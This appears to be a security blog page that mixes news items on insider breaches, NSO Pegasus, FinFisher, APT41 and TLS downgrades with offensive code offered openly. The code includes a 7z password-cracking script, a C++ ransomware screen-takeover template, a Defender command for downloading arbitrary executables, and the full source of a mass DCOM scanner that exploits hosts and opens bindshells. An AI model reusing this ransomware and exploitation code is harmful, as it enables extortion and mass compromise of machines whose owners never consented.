Email service provider Yandex on Friday, February 12, 2021, disclosed a data breach that compromised 4887 email accounts of its users. The company blamed the incident on an unnamed employee, one of three system administrators with technical support access, for providing unauthorized access to the user’s mailboxes for personal gain. The company said the security breach was identified during a routine audit of its systems by an internal security group.
7zip Password Cracker (BASH)
Dependency: p7zip GNU package.
#!/bin/bash
# @(#) p7crack -- Password crack a target 7z file
# Usage: ./p7crack.sh <target_file>
declare -a LIST=(password1 password2 password3)
for x in ${LIST[@]); do
7z x ${1} -p${x}
if [ $? -eq 0 ]; then
echo "${x} is the password"
fi
doneGeneric Win32 Ransomware Template
The following is a basic (C++) program to build out Win32 ransomware projects. It will let you “control” a Windows session’s terminal/screen. The file encrypting, transporting, ransoming, destruction, etc, is left as an exercise to the reader.
#include <Windows.h>
#include <WinGDI.h>
void CreateWndContent0(HWND parent)
{
HWND wnd;
wnd = CreateWindowExW(NULL, L"BTN", L"btn", 0x50012F00, 50, 100, 200, 100, parent, (HMENU) IDC_BUTTON0, instance, NULL);
SendMessage(wnd, WM_SETFONT, (WPARAM) h_font, TRUE);
}
LRESULT CALLBACK WndProc0(HWND hwnd, UINT msg, WPARAM wparam, LPARAM lparam)
{
switch (msg)
{
case WM_CREATE:
CreateWndContent0(hwnd);
break;
case WM_COMMAND:
switch (LOWORD(wparam))
{
case IDC_BUTTON0:
MessageBoxW(hwnd, L"BTN is clicked.", L"Event", MB_OK | MB_ICONINFORMATION);
SendMessageW(hwnd, WM_DESTROY, NULL, false);
break;
}
break;
case WM_SYSCOMMAND:
return true;
break;
case WM_DESTROY:
PostQuitMessage(0);
break;
default:
return DefWindowProc(hwnd, msg, wparam, lparam);
}
return FALSE;
}
HWND CreateWnd0()
{
HWND wnd;
wnd = CreateWindowExW(NULL, WND_CLASS_NAME0, L"window", WS_POPUP, 0, 0, 1920, 1080, NULL, NULL, instance, NULL);
// Get screen size dynamically for the win
hWindow0 = wnd;
SetWindowPos(wnd, HWND_TOPMOST, 0, 0, 0, 0, SWP_NOMOVE | SWP_NOSIZE | SWP_SHOWWINDOW);
ShowWindow(wnd, SW_SHOWNORMAL);
UpdateWindow(wnd);
return wnd;
}
DWORD WINAPI Window0Thread( LPVOID param )
{
SetThreadDesktop(hDesktop); // New desktop where further windows created
RegisterClasses(WndProc0, WND_CLASS_NAME0);
CreateWnd0();
MessageLoop();
ExitThread(0);
}
namespace Window
{
bool CALLBACK HideWindowProc(HWND hwnd, LPARAM lParam)
{
if(GetAncestor(hwnd, 3) == hWindow0)
return true;
ShowWindow(hwnd, SW_HIDE);
return true;
}
bool Init(HINSTANCE hInstance)
{
instance = hInstance;
InitCommonControls();
h_font = CreateFontW(-13, 0, 0, 0, FW_NORMAL, 0,
0, 0, ANSI_CHARSET, OUT_DEFAULT_PRECIS, CLIP_DEFAULT_PRECIS,
DEFAULT_QUALITY, DEFAULT_PITCH | FF_DONTCARE, L"Times New Roman");
hWinsta = GetProcessWindowStation();
SetProcessWindowStation(hWinsta);
hDesktop = CreateDesktopW(L"Our ransomware message, give us all the bitcoins!", 0, 0, 0, GENERIC_ALL, NULL);
hOldDesktop = GetThreadDesktop(GetCurrentThreadId());
SetThreadDesktop(hDesktop); // All windows created under this desktop.
SwitchDesktop(hDesktop); // Take control of what the user sees. Show them the message.
hThreadWindow0 = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) &Window0Thread, 0, 0, 0);
return true;
}
void DeInit()
{
SwitchDesktop(hOldDesktop); // Restore the old, original, desktop.
Because you're a nice boy ;)
CloseDesktop(hDesktop);
CloseWindowStation(hWinsta);
}
}Mexican Cartels Deploying Lawful Intercept Software
A group known as the Cartel Project has released a report detailing the targeting of citizen journalists throughout Mexico who report on cartel dealings. Jorge Carrasco was targeted by software from the Israeli NSO Group called Pegasus, confirmed watchdog group Citizen Lab.
The watchdog group has found at least nine journalists in Mexico targeted with the Pegasus software. While it is doubtful NSO Group entertains cartels for business, the Mexican government is a known customer of various “lawful intercept” software businesses, including NSO Group. It is likely the software ends up in the hands of cartel operators through insiders working within the Mexican government.
It is not known whether the eight journalists killed during 2020 in Mexico were targeted with such spyware.
FinFisher Raids
Sometime last week, between October 6 and 8 of 2020, customs, in conjunction with public prosecution, raided FinFisher company offices and private apartments in both Germany and Romania. A group of NGOs including NetzPolitik filed criminal complaints in Germany against the company, asserting the firm is exporting its malware products (used by German police) to foreign countries without obtaining permission.
Managing directors and employees are under active investigation along with the company for violating the Foreign Trade and Payments Act. These investigations begun last summer 2019. Exporting German-made malware outside the state required a license; lacking this, the trader is criminally liable.
FinFisher has formally stated they never exported their software to Turkey, after a sample was found in 2017.
If the relevant authorities find evidence of exporting malware without a license, FinFisher may have a case brought against it in European court.
NetzPolitik did have a prior case against the firm for supposed violations which the NGO lost due to a preliminary injunction silencing their claims.
Chengdu 404
US DOJ has listed several arrest warrants for Chinese nationals believed to be part of APT41 (Barium). This group is allegedly behind the ASUS hack that lead to hundreds of thousands of infections due to the group using ASUS’s own code signing certificate to push their malware via the company’s update servers.
Some of these infected hosts were targeted with ransomware and cryptojacking malware. The group has engaged in financially-motivated attacks since at least 2012 by targeting gaming companies for the procurement of game currency.
This group, who had a front company named Chengdu 404, likely was coerced by Chinese state officials to engage in traditional espionage activities while allowing the group to continue their financial pursuits.
The group is not known to produce their own 0day exploits but are very quick to deploy new releases once an exploit is dropped, as they did in March 2020 with the Zoho ManageEngine exploit.
Chinese APT groups have traditionally had a reputation of government and corporate espionage for largely information purposes. It appears the Chinese state authorities are turning a blind eye to financially-focused groups so long as they perform actions on behalf of the Party in between their activities.
LoL – Microsoft Defender
Microsoft has graciously allowed users to download arbitrary executables in a recent update to Microsoft Defender since version 4.18.2007.9 and 4.18.2009.9, inclusive.
Command syntax: “mpcmdrun -DownloadFile -url <url> -path <path>”
With some luck we may get ubiquitous SSH access to all Windows workstations in the near future. It would greatly improve connectivity. Think of the possibilities!
Living off the Land is never going away and this is not a security incident. Just another proof point that administrators need to monitor the usage of such integrated tools to keep a full picture of how users, legitimate or compromised, are (ab)using their respective systems.
Example C “Wormable” Scanner
This tool is old but an example that even novice practitioners can have damaging impact on computer systems.
It was used by several underground groups and purportedly compromised a (7) seven-figure number of computer systems around the world at the time of the infamous DCOM vulnerability in 2003/2004.
It relies on advanced exploitation and bug discovery by other groups but was prepared ahead of release by the Polish group who discovered the bug, as they gave a ~three weeks announcement before dropping the 0day. Surely this group was not the only one with such tools ready to go, with further payloads for after a shell was acquired 😉
Before the advent of services like Shodan groups would prescan large address ranges if they knew something was coming and/or they were on the cusp of finding vulnerabilities for a particular service. ISPs were not so strict back then so you could easily do this from home with no issues.
DCOM changed the way ISPs looked at port scanning policies. While not violating national laws they felt it was their moral duty to prevent enumeration techniques as much as possible.
/******************************Windows DCOM Universal Scanner************************\\\\\\\\\\\\
* Coded by Dominatus<[email protected]> \
* \
* This exploit was found by LSD<www.lsd-pl.net> \
* The program to exploit Win2k and WinXP universally was oc192.us Security. \
* I wrote this scanner though, which is what you are looking at right now. \
* \
* Please stop by irc.undernet.org/#kracknet and check out www.kracknet.org(which isn't finished\
* yet), and please check out www.hbx.us, which has free shell accounts, and currently hairball \
* needs some money to keep it up, so please help if you use his services. Check out *
* www.skope6.com, we're a new security group. We post a lot of computer and security *
* information. Come talk with us at irc.undernet.org/#skope6 *
* *
\ *
\ Note: Some ISPs block port 135, so you may have problems finding machines on certain ranges *
\ *
\ What this program does is either scan for machines with <port> open, with the option to log *
\ them to a file, or root the vulnerable IPs from a logfile from a scan, and exploits the OS *
\ you choose. *
\ *
\ YOU TAKE FULL RESPONSIBILITY FOR WHAT YOU DO WITH THIS PROGRAM *
\\\\\\\\\\\\\***********************************************************************************/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <fcntl.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#define ACTIVE 1
#define NOT_ACTIVE 0
#define MAXIMUM_SOCKS 200
struct connection
{
int sock;
char status;
time_t scan_time;
struct sockaddr_in addr;
};
struct connection ConnectionList[MAXIMUM_SOCKS];
void catchsig();
void initialize_connection(char *logFile);
void check_connection(char logFile[256]);
void rootlog(char *logFile);
void usage(char *argv0)
{
fprintf(stderr, "\n\n\n Windows DCOM Universal Scanner\n");
fprintf(stderr, " Coded by Dominatus<[email protected]>\n\n");
fprintf(stderr, " A Production of Skope6 Research Group\n");
fprintf(stderr, " www.skope6.com irc.undernet.org/#skope6/#kracknet www.kracknet.org\n\n");
fprintf(stderr, "==============================================================================================================\n");
fprintf(stderr, "+-- Skope6 Team: dominatus, sybah, eaglex, icecow, hairball, deversify, provizon, brotroxer, and lazurus --+\n");
fprintf(stderr, "==============================================================================================================\n\n");
fprintf(stderr, "**************************************************************************\n");
fprintf(stderr, "Usage:\n\n");
fprintf(stderr, "%s [IP] <-p> <-t> <-r> <-l> <-b> <-s>\n\n", argv0);
fprintf(stderr, "[IP]: IP to begin scanning at (1.0.0.0 - 255.255.255.255)\n");
fprintf(stderr, "-p <port>: Scan/exploit hosts on this port number(default: 135)\n");
fprintf(stderr, "-t <timeout>: Timeout in seconds for sockets(default: 5)\n");
fprintf(stderr, "-r <logfile>: Root the servers from a -l <logfile>\n");
fprintf(stderr, "-l <logfile>: Log hosts with port (default: 135) open in a logfile\n");
fprintf(stderr, "-b <port>: Bindshell port(default: 666)\n");
fprintf(stderr, "-s <selection>: Pick which OS you would like to exploit\n");
fprintf(stderr, " Targets: (use this only with option -r <logfile>)\n");
fprintf(stderr, " 0 Windows 2000 (Universal)\n");
fprintf(stderr, " 1 Windows XP (Universal)(default)\n");
fprintf(stderr, "**************************************************************************\n\n");
fprintf(stderr, "Examples:\n\n");
fprintf(stderr, "%s 207.0.0.1 -l vulnhosts.txt\n", argv0);
fprintf(stderr, "%s -r vulnhosts.txt -s 0 -p 136\n\n", argv0);
exit(0);
}
int startA = 1, startB = 0, startC = 0, startD = 0;
int port = 135;
int root = 0;
int log = 0;
int selection = 1;
int timeout = 5;
int bindport = 666;
char logfile[256];
char *win2k = "Windows 2000 (Universal)";
char *winxp = "Windows XP (Universal)";
int main(int argc, char *argv[])
{
int done = 0;
int i;
int k;
int ns;
int ret;
int opt;
char IP[16];
time_t scan_time;
FILE *logFile;
if (argc < 2)
{
usage(argv[0]);
}
sscanf(argv[1], "%d.%d.%d.%d", &startA, &startB, &startC, &startD);
while ((opt = getopt(argc, argv, "p:t:r:l:s:b:")) != EOF)
{
switch (opt)
{
case 'p':
port = atoi(optarg);
break;
case 't':
timeout = atoi(optarg);
break;
case 'r':
strncpy(logfile, optarg, sizeof(logfile));
logFile = fopen(logfile, "r+");
if (logFile == NULL)
{
fprintf(stderr, "Unable to append to %s\n", logfile);
exit(1);
}
fclose(logFile);
root = 1;
break;
case 'l':
if (optarg == NULL)
usage(argv[0]);
strncpy(logfile, optarg, sizeof(logfile));
logFile = fopen(logfile, "a+");
if (logFile == NULL)
{
fprintf(stderr, "Unable to append to %s\n", logfile);
exit(1);
}
fclose(logFile);
log = 1;
break;
case 's':
selection = atoi(optarg);
break;
case 'b':
bindport = atoi(optarg);
break;
case '?':
usage(argv[0]);
break;
default:
usage(argv[0]);
}
}
if (!root)
if (strlen(argv[1]) > 15)
usage(argv[0]);
initialize_connection(logfile);
scan_time = time(0);
if (log && root)
{
fprintf(stderr, "You can\'t use the -l(log) and -r(root hosts from log) together\n");
exit(1);
}
if (!root)
{
if (startA > 255 || startB > 255 || startC > 255 || startD > 255)
usage(argv[0]);
if (startA < 1 || startB < 0 || startC < 0 || startD < 0)
usage(argv[0]);
}
if (root)
rootlog(logfile);
else
signal(SIGINT, catchsig);
while (!done)
{
for (i = 0; i < MAXIMUM_SOCKS; i++)
{
if (ConnectionList[i].status == NOT_ACTIVE)
{
ConnectionList[i].sock = socket(AF_INET, SOCK_STREAM, 0);
if (ConnectionList[i].sock != -1)
{
ret = fcntl(ConnectionList[i].sock, F_SETFL, O_NONBLOCK);
if (ret == -1)
{
fprintf(stderr, "Unable to set O_NONBLOCK\n");
close(ConnectionList[i].sock);
}
else
{
memset((char *)IP, 0, sizeof(IP));
snprintf(IP, sizeof(IP), "%d.%d.%d.%d", startA, startB, startC, startD);
ConnectionList[i].addr.sin_addr.s_addr = inet_addr(IP);
if (ConnectionList[i].addr.sin_addr.s_addr == -1)
{
fprintf(stderr, "\nInvalid IP\n");
exit(1);
}
ConnectionList[i].addr.sin_family = AF_INET;
ConnectionList[i].addr.sin_port = htons(port);
ConnectionList[i].scan_time = time(0);
ConnectionList[i].status = ACTIVE;
startD++;
if (startD == 256)
{
if (startC < 255)
{
startD = 0;
startC++;
}
else
{
if (startB < 255)
{
startD = 0;
startC = 0;
startB++;
}
else
{
if (startA < 255)
{
startD = 0;
startC = 0;
startB = 0;
startA++;
}
else
{
fprintf(stderr, "Finished\n");
for (i = 0; i < MAXIMUM_SOCKS; i++)
close(ConnectionList[i].sock);
exit(0);
}
}
}
}
}
}
}
}
check_connection(logfile);
}
}
void catchsig()
{
int i;
fprintf(stderr, "\n\nCtrl+C caught\n");
fprintf(stderr, "Closing Connections...\n");
for (i = 0; i < MAXIMUM_SOCKS; i++)
{
close(ConnectionList[i].sock);
}
fprintf(stderr, "Connections Successfully Closed\n");
exit(0);
}
void initialize_connection(char *logFile)
{
int i;
for (i = 0; i < MAXIMUM_SOCKS; i++)
{
ConnectionList[i].status = NOT_ACTIVE;
memset((struct sockaddr_in *)&ConnectionList[i].addr, 0, sizeof(struct sockaddr_in));
}
fprintf(stderr, " Windows DCOM Universal Scanner\n");
fprintf(stderr, " coded by Dominatus<[email protected]>\n\n");
fprintf(stderr, " A Production of Skope6 Research Group\n");
fprintf(stderr, " www.skope6.com irc.undernet.org/#skope6/#kracknet www.kracknet.org\n\n\n");
if (!root)
{
fprintf(stderr, "Starting scan from %d.%d.%d.%d Port: 135 Timout: %d second(s)\n", startA, startB, startC, startD, timeout);
fprintf(stderr, "Press Ctrl+C to stop or Ctrl+Z to suspend\n\n");
}
}
void check_connection(char logFile[256])
{
int i;
int ret;
int selectionCheck = selection;
char IPaddress[16];
FILE *logf;
for (i = 0; i < MAXIMUM_SOCKS; i++)
{
if ((ConnectionList[i].scan_time < (time(0) - timeout)) && (ConnectionList[i].status == ACTIVE))
{
close(ConnectionList[i].sock);
ConnectionList[i].status = NOT_ACTIVE;
}
else if (ConnectionList[i].status == ACTIVE)
{
memset(ConnectionList[i].addr.sin_zero, 0, 8);
ret = connect(ConnectionList[i].sock, (struct sockaddr *)&ConnectionList[i].addr, sizeof(struct sockaddr_in));
strncpy(IPaddress, (char *)inet_ntoa(ConnectionList[i].addr.sin_addr), sizeof(IPaddress));
if (ret == -1)
{
if (errno == EISCONN)
{
fprintf(stderr, "%s\n", IPaddress, (time(0) - ConnectionList[i].scan_time));
close(ConnectionList[i].sock);
ConnectionList[i].status = NOT_ACTIVE;
}
if ((errno != EALREADY) && (errno != EINPROGRESS))
{
close(ConnectionList[i].sock);
ConnectionList[i].status = NOT_ACTIVE;
}
}
else
{
if (log)
{
logf = fopen(logFile, "a+");
fprintf(logf, "%s\n", IPaddress);
fclose(logf);
}
else
fprintf(stderr, "Host: %s\n", IPaddress);
close(ConnectionList[i].sock);
ConnectionList[i].status = NOT_ACTIVE;
}
}
}
}
void rootlog(char *logFile)
{
int selectionCheck = selection;
char IPaddress[256];
char exploitString[256];
FILE *logf;
logf = fopen(logFile, "r+");
fprintf(stderr, "\nHold Ctrl+C to quit\n");
while ((fgets(IPaddress, sizeof(IPaddress), logf)) != NULL)
{
if (selectionCheck == 0)
{
snprintf(exploitString, sizeof(exploitString), "./oc192-dcom -d %s -t %d -p %d -l %d", IPaddress, selectionCheck, port, bindport);
fprintf(stderr, "\nTrying to exploit %s using %s\n\n", IPaddress, win2k);
system(exploitString);
}
else if (selectionCheck == 1)
{
snprintf(exploitString, sizeof(exploitString), "./oc192-dcom -d %s -t %d -p %d -l %d", IPaddress, selectionCheck, port, bindport);
fprintf(stderr, "\nTrying to exploit %s using %s\n\n", IPaddress, winxp);
system(exploitString);
}
else
fprintf(stderr, "\nSomething Failed\n");
}
fprintf(stderr, "\nFinished\n");
exit(0);
}
Facebook Hating the Player
It is alleged in court, officially, Facebook sought out NSO Group in October 2017 to purchase the right to use Pegasus capabilities for users of Onavo Protect.
Onavo Protect was a “free” VPN solution provided by Facebook. The catch was Facebook was analyzing web traffic to detect usage of other apps. This is not the main use case of Pegasus (post exploitation framework for iOS), as representatives wanted to monitor phones of users who had installed Onavo.
The need for Pegasus came from Facebook not having as much insight into user behavior via data collection on iOS as compared with Android. Thus, Facebook potentially wanted to use Pegasus to close the gap between the operating system data collection abilities.
Recently Facebook has been upset due to NSO Group releasing modules for customers which included a 0-click exploit against WhatsApp users.
Charitable Internet Companies, Slow Moving Governments
Mozilla, creator of popular internet browser Firefox, made the bold move of re-enabling suppor for outdated and very insecure (for governments especially) HTTP encryption protocols TLS v1.0 and 1.1. Several known attacks exists against services exposed over these protocols that are realistically exploitable for nation state attackers.
Many government sites around the world are still hosted using these long-outdated protocols despite being retired by all popular browsers back in October 2018. Qualys SSL Labs found over 97% of surveyed sites are supporting TLS v1.2+.
Still, at least 850000 websites are using these outdated protocols, allowing sophisticated attackers to, at the least, decrypt web traffic of other users.
Due to various governments apparently not having the means to upgrade their infrastructure during the global virus pandemic known as “Corona”, Mozilla decided to re-enable support for these retired, forbidden protocols to allow sharing of information.